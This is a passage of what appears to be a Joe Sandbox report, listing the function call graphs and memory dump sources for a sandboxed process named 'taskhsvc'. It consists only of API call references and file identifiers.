      • Part of subcall function 003423F9: SSL_get_wbio.SSLEAY32 ref: 0034243E
      • Part of subcall function 003423F9: BIO_f_buffer.LIBEAY32 ref: 0034244B
      • Part of subcall function 003423F9: BIO_next.LIBEAY32 ref: 0034245A
      • Part of subcall function 003423F9: BIO_number_written.LIBEAY32 ref: 00342474
      • Part of subcall function 003423F9: __stack_chk_fail.LIBSSP-0 ref: 00342538
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 0031985E: __stack_chk_fail.LIBSSP-0 ref: 00319A18
    • abort.MSVCRT ref: 001F12C4
      • Part of subcall function 00206E23: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,001C3569), ref: 00206E4C
      • Part of subcall function 00206E53: abort.MSVCRT(?,?,?,?,?,?,?,?,?,001C35A2), ref: 00206EA5
      • Part of subcall function 00206E53: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C35A2), ref: 00206EB6
      • Part of subcall function 001E3DED: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C1825), ref: 001E3E14
      • Part of subcall function 001E4527: abort.MSVCRT ref: 001E459D
      • Part of subcall function 001E4527: abort.MSVCRT ref: 001E45E0
      • Part of subcall function 001E4527: abort.MSVCRT ref: 001E46E5
      • Part of subcall function 001E4527: __stack_chk_fail.LIBSSP-0 ref: 001E4715
      • Part of subcall function 001E8A34: abort.MSVCRT ref: 001E8A8A
      • Part of subcall function 001E8A34: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001F13F9), ref: 001E8A9D
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 001E8860: abort.MSVCRT ref: 001E88CA
      • Part of subcall function 001E8860: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001E9EDC), ref: 001E88DD
      • Part of subcall function 0027DCF8: abort.MSVCRT ref: 0027DD82
      • Part of subcall function 0027DCF8: __stack_chk_fail.LIBSSP-0 ref: 0027DD95
      • Part of subcall function 001E557C: abort.MSVCRT ref: 001E562E
      • Part of subcall function 001E557C: __stack_chk_fail.LIBSSP-0 ref: 001E56D1
      • Part of subcall function 001E8780: abort.MSVCRT ref: 001E87D6
      • Part of subcall function 001E8780: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001EA4BB), ref: 001E87E9
      • Part of subcall function 00325435: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,001F0905), ref: 00325455
      • Part of subcall function 001EF888: __stack_chk_fail.LIBSSP-0 ref: 001EFBD5
      • Part of subcall function 001EFBE0: abort.MSVCRT ref: 001EFCC0
      • Part of subcall function 001EFBE0: __stack_chk_fail.LIBSSP-0 ref: 001EFD44
    • __stack_chk_fail.LIBSSP-0 ref: 001F1529
      • Part of subcall function 001C274C: abort.MSVCRT ref: 001C279C
      • Part of subcall function 001C274C: event_pending.LIBEVENT-2-0-5 ref: 001C27D2
      • Part of subcall function 001C274C: __stack_chk_fail.LIBSSP-0 ref: 001C27F2
      • Part of subcall function 001EFD4B: abort.MSVCRT ref: 001EFE2B
      • Part of subcall function 001EFD4B: __stack_chk_fail.LIBSSP-0 ref: 001EFEAF
      • Part of subcall function 001EF26C: __stack_chk_fail.LIBSSP-0 ref: 001EF37D
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 003F6BB0, Relevance: 3.2, APIs: 2, Instructions: 181
    APIs
      • Part of subcall function 003F6A10: fwrite.MSVCRT ref: 003F6A3B
      • Part of subcall function 003F6A10: vfprintf.MSVCRT ref: 003F6A57
      • Part of subcall function 003F6A10: abort.MSVCRT ref: 003F6A5C
      • Part of subcall function 003F6A70: VirtualQuery.KERNEL32 ref: 003F6B00
      • Part of subcall function 003F6A70: VirtualProtect.KERNELBASE ref: 003F6B42
      • Part of subcall function 003F6A70: GetLastError.KERNEL32 ref: 003F6B64
    • VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 003F6D3B
    • VirtualProtect.KERNELBASE ref: 003F6D6C
    Memory Dump Source
    • Source File: 00000013.00000002.1855588250.003F6000.00000080.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 002C0435, Relevance: 3.1, APIs: 2, Instructions: 117
    APIs
      • Part of subcall function 002C032C: __stack_chk_fail.LIBSSP-0 ref: 002C042E
      • Part of subcall function 00315B2B: CreateFileA.KERNEL32 ref: 00315BEF
      • Part of subcall function 00315B2B: free.MSVCRT ref: 00315E9E
      • Part of subcall function 00315B2B: __stack_chk_fail.LIBSSP-0 ref: 00315F2B
      • Part of subcall function 00326B1B: abort.MSVCRT ref: 00326B85
      • Part of subcall function 00326B1B: strerror.MSVCRT ref: 00326BFE
      • Part of subcall function 00326B1B: _close.MSVCRT ref: 00326C73
      • Part of subcall function 00326B1B: _close.MSVCRT ref: 00326CDE
      • Part of subcall function 00326B1B: strerror.MSVCRT ref: 00326D57
      • Part of subcall function 00326B1B: free.MSVCRT ref: 00326D9F
      • Part of subcall function 00326B1B: _close.MSVCRT ref: 00326DB1
      • Part of subcall function 00326B1B: strchr.MSVCRT ref: 00326DED
      • Part of subcall function 00326B1B: strlen.MSVCRT ref: 00326E4C
      • Part of subcall function 00326B1B: free.MSVCRT ref: 00326EEB
      • Part of subcall function 00326B1B: _close.MSVCRT ref: 00326EFD
      • Part of subcall function 00326B1B: _close.MSVCRT ref: 00326F1D
      • Part of subcall function 00326B1B: memcpy.MSVCRT ref: 00326F3D
      • Part of subcall function 00326B1B: __stack_chk_fail.LIBSSP-0 ref: 00326F50
    • __stack_chk_fail.LIBSSP-0 ref: 002C05F7
      • Part of subcall function 002BFAA4: free.MSVCRT ref: 002BFC97
      • Part of subcall function 002BFAA4: free.MSVCRT ref: 002BFE2B
      • Part of subcall function 002BFAA4: free.MSVCRT ref: 002BFF60
      • Part of subcall function 002BFAA4: __stack_chk_fail.LIBSSP-0 ref: 002BFFCF
    • free.MSVCRT ref: 002C059D
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BA5
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BC7
      • Part of subcall function 00319B70: __stack_chk_fail.LIBSSP-0 ref: 00319BE1
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 002C0B63: abort.MSVCRT ref: 002C0D46
      • Part of subcall function 002C0B63: free.MSVCRT ref: 002C0E12
      • Part of subcall function 002C0B63: strerror.MSVCRT ref: 002C0ED3
      • Part of subcall function 002C0B63: abort.MSVCRT ref: 002C1041
      • Part of subcall function 002C0B63: memcmp.MSVCRT ref: 002C108C
      • Part of subcall function 002C0B63: abort.MSVCRT ref: 002C1101
      • Part of subcall function 002C0B63: free.MSVCRT ref: 002C1181
      • Part of subcall function 002C0B63: memcmp.MSVCRT ref: 002C11A6
      • Part of subcall function 002C0B63: abort.MSVCRT ref: 002C11E3
      • Part of subcall function 002C0B63: __stack_chk_fail.LIBSSP-0 ref: 002C129E
    Memory Dump Source
    • Source File: 00000013.00000002.1855196147.00290000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00312523, Relevance: 3.1, APIs: 2, Instructions: 113
    APIs
      • Part of subcall function 0032FC04: exit.MSVCRT ref: 0032FC72
      • Part of subcall function 0032FC04: __stack_chk_fail.LIBSSP-0 ref: 0032FD09
      • Part of subcall function 00318F30: abort.MSVCRT ref: 00318F86
      • Part of subcall function 00318F30: localtime.MSVCRT ref: 00318F91
      • Part of subcall function 00318F30: memcpy.MSVCRT ref: 00318FB4
      • Part of subcall function 00318F30: __stack_chk_fail.LIBSSP-0 ref: 00318FE5
    • strftime.MSVCRT ref: 00312608
      • Part of subcall function 0031237C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,0031261B), ref: 003123F5
      • Part of subcall function 00316005: __stack_chk_fail.LIBSSP-0 ref: 0031605E
    • __stack_chk_fail.LIBSSP-0 ref: 0031266E
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001E557C, Relevance: 3.1, APIs: 2, Instructions: 74
    APIs
    • __stack_chk_fail.LIBSSP-0 ref: 001E56D1
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 001E562E
      • Part of subcall function 001E52AC: abort.MSVCRT ref: 001E533A
      • Part of subcall function 001E52AC: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001C33C1), ref: 001E5350
      • Part of subcall function 001E5005: memcpy.MSVCRT ref: 001E50B2
      • Part of subcall function 001E5005: abort.MSVCRT ref: 001E5136
      • Part of subcall function 001E5005: __stack_chk_fail.LIBSSP-0 ref: 001E514C
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001F2301, Relevance: 3.1, APIs: 2, Instructions: 72
    APIs
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
      • Part of subcall function 001E8780: abort.MSVCRT ref: 001E87D6
      • Part of subcall function 001E8780: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001EA4BB), ref: 001E87E9
    • abort.MSVCRT ref: 001F232D
      • Part of subcall function 001E5005: memcpy.MSVCRT ref: 001E50B2
      • Part of subcall function 001E5005: abort.MSVCRT ref: 001E5136
      • Part of subcall function 001E5005: __stack_chk_fail.LIBSSP-0 ref: 001E514C
    • __stack_chk_fail.LIBSSP-0 ref: 001F2527
      • Part of subcall function 00206E53: abort.MSVCRT(?,?,?,?,?,?,?,?,?,001C35A2), ref: 00206EA5
      • Part of subcall function 00206E53: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C35A2), ref: 00206EB6
      • Part of subcall function 00206E23: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,001C3569), ref: 00206E4C
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 001E8860: abort.MSVCRT ref: 001E88CA
      • Part of subcall function 001E8860: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001E9EDC), ref: 001E88DD
      • Part of subcall function 0027DCF8: abort.MSVCRT ref: 0027DD82
      • Part of subcall function 0027DCF8: __stack_chk_fail.LIBSSP-0 ref: 0027DD95
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
